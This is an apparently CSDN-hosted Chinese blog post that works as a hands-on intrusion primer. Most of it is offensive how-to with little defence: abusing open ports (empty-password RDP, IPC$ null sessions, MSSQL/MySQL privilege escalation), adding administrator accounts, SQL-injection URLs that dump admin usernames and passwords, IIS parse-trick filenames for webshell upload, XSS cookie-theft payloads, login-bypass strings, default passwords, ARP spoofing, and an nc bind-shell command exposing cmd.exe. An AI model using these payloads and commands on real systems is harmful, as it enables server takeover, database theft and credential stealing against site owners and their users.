安全渗透 by80

网络安全 专栏收录该内容
13 篇文章 0 订阅
 
 1章    内容:端口 命令

1,端口,这个很让人理解的字眼,电脑的端口一共有65535个,但实际用到的却只有几十个,常见的端口


3389,4899,135,445,5900,1433,3306,1521,21,80,23,25,53等等,端口就像一座房子的烟囱一样,如果打开了,就可能会面临着一些风险,如3389,这是远程桌面的端口,他主要用于两个方面,一是实现网络交互的过程,一台电脑连接到另外一台电脑的桌面,第二个方面就是被黑客的提权利用,命令是MSTSC,而3389端口入侵正是实现了这样的功能,而3389针对的是WINXP的系统空密码,也就是说,XP系统的用户如果密码为空,3389端口也打开的情况下,如果被黑客扫描到,那么就可以远程被利用,黑客通过IP地址,远程连接,并在窗口输入administrators, 密码为空,直接确定,就可以看到对方的桌面了,但3389有个弊端,如果对方发现,移动了鼠标,那么远程桌面将关闭。而空密码与空连接就是不同的方式了,空连接是IPC空连接 ,利用格式为:net use \\ip\ipc$ "" /user:"admin", 意思就是密码都空的时候对目标地址进行空连接,如果成功,那么就可以实现一个映射的功能 net use z: \\ip\c$,这就是远程映射的功能,把目标服务器的C盘映射为本地的Z盘,对方的盘符,我们在本地的Z盘可以访问对方C的内容了。开启3389服务器就是在系统设置里的远程,允许用户远程连接打勾就可以了。


  4899,4899端口其实跟3389的模式是差不多的,而4899是通过RAMIN影子服务端进行连接,4899通常是针对空密码的用户,如果漏洞存在,可以通过影子服务端远程连接,实现远程控制的功能。


  135,135端口准确的说他是一个溢出端口,如果在网吧,我们可以使用命令 NETSTAT -AN ,这个命令是查看开放了哪些端口,而一般情况下,网吧都开放了135与445端口,而不怀好意的人就会使用远程控制软件生成木马,内网映射成功后,就可以批量的进行传马到其他机器,这样很多电脑都因此成为了肉鸡


  5900,5900端口一般针对国外服务器,攻击者可以使用VNC连接器对5900国外服务器进行批量检测,这个方式要用到VPN代理技术,而扫描方式通常会选择SYN,省去了TCP延时的问题


  1433,想必大家对1433这个端口很熟悉,没错,他是SQL SERVER的端口,而1433通常去寻找SA的弱口令进行检测,1433连接工具就发挥了这个作用,利用者通过得到的密码文件,输入用户名与密码以及数据库的名字,远程连接对方的数据库,接着执行SQL提权命令,成功达到服务器侵入的目的。


  3306, MYSQL的端口,漏洞存放目录一般为conn.asp config.php common.inc.php 里面存在网站的根目录下,利用者得到了此数据,一般有两个方向,1,MYSQL脱库,2,MYSQL提权 ,MYSQL脱库是针对的论坛服务器,会员数据,利用MYSQL远程连接数据库,一般是找到SELECT * FROM MEMBERS表的位置,然后导出文件SQL到本地,里面存放的就是会员的详细数据了。而MYSQL提权就是提升权限,需要导注册表的DLL文件,然后执行SQL命令增加一个管理组,而一般MYSQL数据库大于5.0时,导出就必须是安装目录了,小于5,0的话可以导出到 :c:/windows/udf.dll,因为后期版本官方也做了一些限制!


  命令也是同样重要的,如WIN与LINUX的系统命令,MS-DOS环境下的命令,大概的命令要记住


  WIN:  NET USER ADD ADD /ADD NET LOCALGROUP ADMINISTRATORS ADD /ADD 加入管理组帐号


  WMIC PROCESS 查看当前系统进程详细路径


  ARP -A 查看当前的系统MAC地址


  TRACERT -D 追踪路由  


  PING  测试命令


  systeminfo 查看系统配置信息


  md ren rd 新建目录,目录改名,删除目录


  NETSTAT -V 正在进行的工作 -A 查看当前监听的端口 -N 正在进行的连接  -AN 查看开放了哪些端口


   AT 计划任务




   二章      内容: WEB脚本安全 


  WEB脚本安全,也是网络安全的一个重中之重,如何认识脚本安全呢?


  首先我们得对网站的类型与架构要有所了解,如ASP网站,PHP网站,JSP网站,ASPX网站,CGI等等


  一般安全性通常为:ASP-->PHP-->ASPX-->JSP--<


  可以看出,ASP的安全性是最低的,我们都知道一个网站的程序是程序员设计的,那么程序设计中


  有可能会出现漏洞,一旦有漏洞,就会被一些人成功利用,这就是WEB脚本安全,学习脚本安全对于


  自身对WEB安全有一定认识,并熟练掌握WEB攻防相关技术。


 


  服务器管理员把网站架设到外网,实现了多人访问的目的,那么服务器是开着,既然有外部网络通讯这一功能


,那么脚本安全就诞生了,一个技术诞生也意味着另外一个技术的衍生,比如汇编,反汇编,同样的道理,利用者通过


外部网站所架设的虚拟站点进行逐一检测,最终发现漏洞。


 


  原理:通过程序设计漏洞远程写入脚本木马到服务器网站根目录下,接着连接外部路径地址,形成网络后门。 


  优点:服务器单向渗透并指于异常困难,而脚本安全就取而代之了,通过脚本得到SHELL的权限后再去执行服务器提升这样一个途径。


 ASP 网站漏洞分析:


 


 一般ASP的网站 应用于小型公司企业所需求


 常见漏洞:SQL注入 ,爆库,目录遍历,越权访问,上传,弱密,社会工程学,XSS , 编辑器, COOKIE, OR,FTP,穷举


 SQL漏洞原因:变量过滤不严,


 爆库是由于没有写容错代码


 注入测试方法:AND 1=1 AND 1=2  前提是动态网站,而非静态


 在网站上打开一个新闻的动态页面,然后打一‘提交


 http://www.baidu.com/asp/asp?id=30%20and%201=1  正常


 http://www.baidu.com/asp/asp?id=30%20and%201=2  错误


 存在注入 ,工具注入,以及手工注入都是可以的


 需要进行猜表,表名,列名,以及用户,最后获得密码


 密码一般都是16进制加密,需要到专门的MD5网站进行解密


 爆库,一般分为两种,一种是CONN爆库  %5C爆库  %23爆库


 CONN爆库是由于管理员没有阻止外部人员对此文件的访问


 导致可以访问:http://www.adminx.com/admin/conn.asp  如果报错一定会出现数据库的具体路径


               http://www.adminx.com/inc/config.asp  一般是禁止的


               http://www.adminx.com/inc/conn.asp  一般为空白


  %5C是二级目录的爆库方式


 格式为:http://www.admin.com/asp/uid?id=1   正常页面


         http://www.admin.com/asp/%5cuid?id=1  如果成功会"弹出数据库下载"


  


 %23是针对数据库爆库


 我们知道,数据库的表达格式是www.xxx.com/data  www.xxx.com/database  www.xxx.com/datas 


 通常这些都是403禁止的,假如我们如果知道数据库的真实下载地址


 表达式:http://www.xxx.com/databases/#xin_wenku.mdb   访问后会显示禁止页面


         http://www.xxx.com/databases/%23xin_wenku.mdb  访问后会弹出MDB数据库下载


 


 目录遍历就是管理员对网站根目录下的子目录权限访问没有做限制


导致利用者可以访问到这些目录,从而对下一步收集信息作为必要条件


 表达式:http:www.xxx.com/manage/../ 目录遍历,可以看到很多目录


  越权访问,就是管理员对目录文件下的后台操作文件页面的权限没做限制,导致利用者可以以匿名的方式访问


到系统后台的内容,这样是很危险的,利用者有时候四俩薄千金就侵入了一个站点


  表达式:http://www.xxx.com/manage/asp/edit.moneyasp?id=#  


  可能出现的页面: 新闻发布页面,管理员添加页面,会员列表页面,网站布局页面等


  上传漏洞 ,也就是网站的图片上传点,有的上传地址很隐秘,本来是用来用户组上传图片,或者头像,或者是公司的PDF,XLS,DOC文件用的,但有的人却用来利用


常见的上传漏洞页面有很多 ,方法有:GIF89A  图片木马伪装, 一句话漏洞 ,IIS解析


 


  表达式:http://www.xxx.com/include/upload.jsp      http://www.com/include_admin/upload.asp     http://www.com/upload_class.asp 


 


例如利用者把上传页面的源码保存到本地记事本,然后在第一行写入GIF89A,再进行图片提交 


或者使用一句话木马的方式合并到图片中,上传 比如之前早期的NGINX漏洞就是利用的IIS双向解析功能实现


表达式:http://www.xxx.com/php/ass/1.jpg/先访问这个图片地址 ,如果能正常显示,再合访问0x.php  


        http://www.xxx.com/php/ass/1.jpg/0x.php 会出现空白,你会发现什么也没有,其实是后门成功了!


通过一句话木马PHP客户端连接,输入密码就可以上传脚本木马到网站根目录获得WEBSHELL的权限


解析表达式:1.asp;.jpg 1.jpg.asp  2.asa;.gif  0x;x.jpg;0x;y.jpg 


意思就是末尾虽然是图片的格式,但他会通过ASP,ASA这样的方式去执行这个图片,其实相当于执行了我们的脚本木马了!


 


 弱密码,有的网站,管理员一般把密码设置得过于简单化,如123,456,123456 ADMIN ADMIN888 ADMIN123 这样的密码很可能被黑客攻破


导致网站的安全性受到威胁!




社会工程学,这个是相当强大的一门技术,他需要掌握与洞察它人的心理状态,其实意为'心理破解者",如破解一个邮箱,他需要先收集这个主人一切可利用的资料,通过分析,分析这个人的日常状态,日常习惯,等等最后破译密码!很多书店也有卖这样的书籍,价格一般都在30-40元左右!




XSS, 一般分别XSS跨站攻击,以及XSS盲打  它是一种被动式攻击


 基本表达式:<script>alert("1")</script>   弹出消息对话框:1


           <script>alert(document.cookie)</script>  弹出COOKIE值


          <script>window.open("http://baidu.com")</script>  打开百度网站




 跨站表达式:www.xxx.com/asp/asp?id="><script>alert("0")</script>


 挂马跨站表达式 www.xxx.com/asp/asp?id=<iframe src="url">0x</iframe> 需要把他转换为HEX格式


 框架嵌入动态表达式:www.xxx.com/asp/asp?id=<iframe src="url">0x</iframe><marquee>hello</marquee>




 而盲打技术,是针对自己写一个JS代码 ,通过留言页面,管理员一般会审核这样的信息,当他点击后,COOKIE就被自动保存到我们的后门中


 表达式:http://www.xxx.com/cookie/cookie.asp


 


 编辑器漏洞,应该有出现的时间很早 ,一般分为EWEB与FCKEDITOR 漏洞


 编辑器后台一般为 ewebeditor/admin_login.asp


ewebeditor/ewebeditor.aspx ewebeditor/ewebeditor.htm ewebeditor/ewebeditor.asp?id=1  ewebeditor/admin_style.asp


ewebeditor/admin/db/#ewebeditor.mdb ,ewebeditor/db/#ewebedior1033.mdb 


 密码一般为 ADMIN888 ADMIN  ADMIN999


 


 FCKEDITOR 编辑器的漏洞


 


 利用的方式也很多


  PHP CMS 就可以利用编辑器上传获得权限


 HTTP://WWW.XXX.COM/ADMIN/FCKEDITOR/../.../../


 COOKIS中转,这个漏洞的形成是因为我们在SQL注入失败的情况下,所采取的另外一种注入方式,简称COOKIE注入


 准备工具:小旋风ASP环境 ,注入,猜表工具


 首先将环境端口设置为82或者81


 接着找一个页面生成127页面 


 对比表达式:http://www.xxx.com/asp/aasp?id=1   注入失败


             http://127.0.0.1:81/ROOT地址/POST提交值   可以注入


  OR漏洞 ,熟知的 'or'='or'  漏洞 


  针对一些ASP公司网站的后台管理系统,用户密码均输入'or'='or'


  如果成功,可以直接进入后台


  USER:‘OR’=‘OR’


  NAME: ‘OR’=‘OR’


 


  FTP的漏洞一般出现于2个特点  : 匿名访问 ,弱密码 


  表达式:ftp://www.xxx.com 匿名访问,直接进入


  弱密码:ftp:www.cc.com user:ftp pass:ftp@ftp.net 输入密码后进入


  如在FTP里放入一个TXT ,内容写为1


  那么访问时,也可以 http:wwww.cc.com/1.txt 


  穷举法针对系统爆破工程 ,一般分别DIC文件字典的爆破方式,收集很多现成的字典,对某个邮箱,或者某个QQ的密码或者某个网站的后台,


 进行指定破解,时间耗费很长!


  php 网站漏洞分析


 


  一般漏洞首先就是注入了,


  表示式:http://www.ccc.com/asp/php?id=10%20order%20by%201  猜字段


        http://www.ccc.com/asp/php?id=10%20order%20by%2018  正常


        http://www.ccc.com/asp/php?id=10%20order%20by%2020  错误


 可以判断字段19个,依次拼写19个字段在地址中 ,3个常用变量,database() version user()


3个函数转换要知道 ,c:/win.ini  load_file(), 注射时还可以使用HEX(MID函数进行读路径)


路径表达式:d:/wwwroot/php/uc/config.php


  表达式:http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  页面显示正常既为成功


      http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin 如果错误页面找不到


    http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 页面正常既为找到,一般会显示出几个数字,如3,6,8,等字样,我们一般就取3与6


http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user   查看用户: root@localhost
http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 查看数据库的版本,大于5,0可以爆库


 http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,databse(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user  查看数据库的名字


http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,user,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user  页面正常既为猜到用户与密码,反之会返回错误404


http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,load_file(读取INI地址),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user 


http://www.ccc.com/asp/php?id=10%20and%1=2%20union%20select 1,2,HEX(MID),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin_user


 


还有就是一些系统源码的ODAY,比如动网论坛,动易,老Y文章系统,动科,风讯,DEDECMS织梦,帝国CMS


等等,一般遇到这类的漏洞,有的是EXP注射,有的则需要GET SHELL,自己搭建好PHP环境,接着在DOS窗口里输入命令执行相关漏洞,如开源工具MSF ,就是集成的溢出平台,需要哪个直接通过命令调用就可以了 命令为:show exploits




除此之外,还有PHP文件包含漏洞


表达格式:http://www.a.com/asp/id=http://www.b.com/1.php 


也就是说在A点取得的权限,通过源码系统,之间到B点进行读取,这样的话,B点就被利用了,我们就这样获得了B的权限


但前提是在A点先取得权限!


包括ASPX,出现的有时候会出现一个CER表单漏洞,或者是万能密码漏洞




  JSP 漏洞分析




 JSP一般用于,银行,新闻门户站,安全性在外人看来相对较高,但JSP安全性虽然最高,但要说明的是,在提权技术里,JSP权限却是最大的,而相对于不太安全的ASP网站,ASP匿名的权限却降低了!MYSQL有时候也会出现降权!


 


 漏洞一般存在于JS校检未过滤


 导致上传


 二级域名上传漏洞


 表达式:http:www.xx.gov.cn  http://ad.xx.gov.cn/upload.asp    http://svx.xx.gov.com/upload.php


 <form>


 <form action="sadd.jsp" method="post"><br/>


 <input type="file" ><br/>


 <input type="submit" value="go!">


  </form>


  后台管理权限技术


  假如我们通过一个很简单的密码测试进入了自己搭建的网站后台,这时候我们需要获得WEBSHELL权限的时候,就可以通过各种途径了,方法有很多


 例如数据库备份,抓包改包,搭建地址两次上传,解析,直接上传,等等 


  允许的格式:gif,bmp,jpg


  禁止的格式:cer,asp,php,jsp,aspx


  旁注漏洞的诞生,也就是网站服务器上,捆绑了很多域名,有购物网,人才网,新闻网,我们目标是新闻网,而新闻网通过测试并未发现很多漏洞,这时候我们就可以人才网入手,去检测,最终通过跨目录,或者ASPX IIS 权限读写的方式获得新闻网的权限 




  C段,也就是可以IP地址来表示 ,一个IP段 210.44.123.1-219.44.123.255 之间的255台机器,比如,利用者的目标是210,44,123,5这个地址


这时候我们只需要在这个段里检测成功一台服务器后,在服务器里执行嗅探,如果对方目标未装防火墙,则会被嗅探到,这就是服务器分离状态下的利用方式




表达式: a : 》   b:  》


 


    -- a  目标服务器


    b++   在B段里找一台同网段的服务器


    b++ =a  最终嗅到数据,最后指向目标A


 


 而劫持,与欺骗,都是在cain 与NET FUCER里面完成的 


 劫持,一般分为域名劫持,以及ARP劫持


 一般是在同网段服务器里与C段一样的方式,但不同的是,他运用的是劫持


 也就是发送欺骗流量包给目标服务器,服务器被欺骗后主页文件就自动被改成我们想要的内容了。


 而欺骗,一般是ARP,或者是DNS欺骗,ARP欺骗主要是欺骗目标机器的3389 HOST文件,文本格式


 利用C32反汇编工具打开可以清楚的看到在地址的后边,用户与密码就泄露了


  服务器提权技术 


  在自行搭建的SHELL网站里,如果不会提权,那么就无法进行下一步


  所以我们需要学习提权技术


  而提权技术一般分别  WIN LINUX提权


  常用工具:巴西烤肉 ,PR大杀器 ,NC监听,LCX转发 ,WIN2003内核溢出 ,IIS6,0, MS,EXE ,SHIFT后门


  提权的步骤


  1,检查网站的权限,如ASP匿名权限 ,是否支持ASPX


  2,检查WC组件是否支持


  3,一般来说,回收站与TEMP目录权限是比较大的


  4,检查CONFIG,ASP,CONN。ASP相关密码


  5,检查FXP 传输工具的文件


  5,检查是否安装PCANYWHERE


  6,是否安装SERTU FTP服务器


  7,检查3389端口是否开启


  8,检查目录文件程序是否可以替换


  9,检查RAMIN密码是否存在


  10,检查检查是否支持JSP权限


  这是外网的方式,而遇到内网的时候,则需要转发 ,首先得本地监听,再转发到3389,利用本地127地址:监听端口去连接对方3389


NC反弹命令: C:/winodws/nc.exe -l -p 5858 -t -e c:/windows/cmd.exe  
还有一个就是SHELL CODE ,牛人的道路从这里启航!


                                                                           


  















  • 1
    点赞
  • 0
    评论
  • 1
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值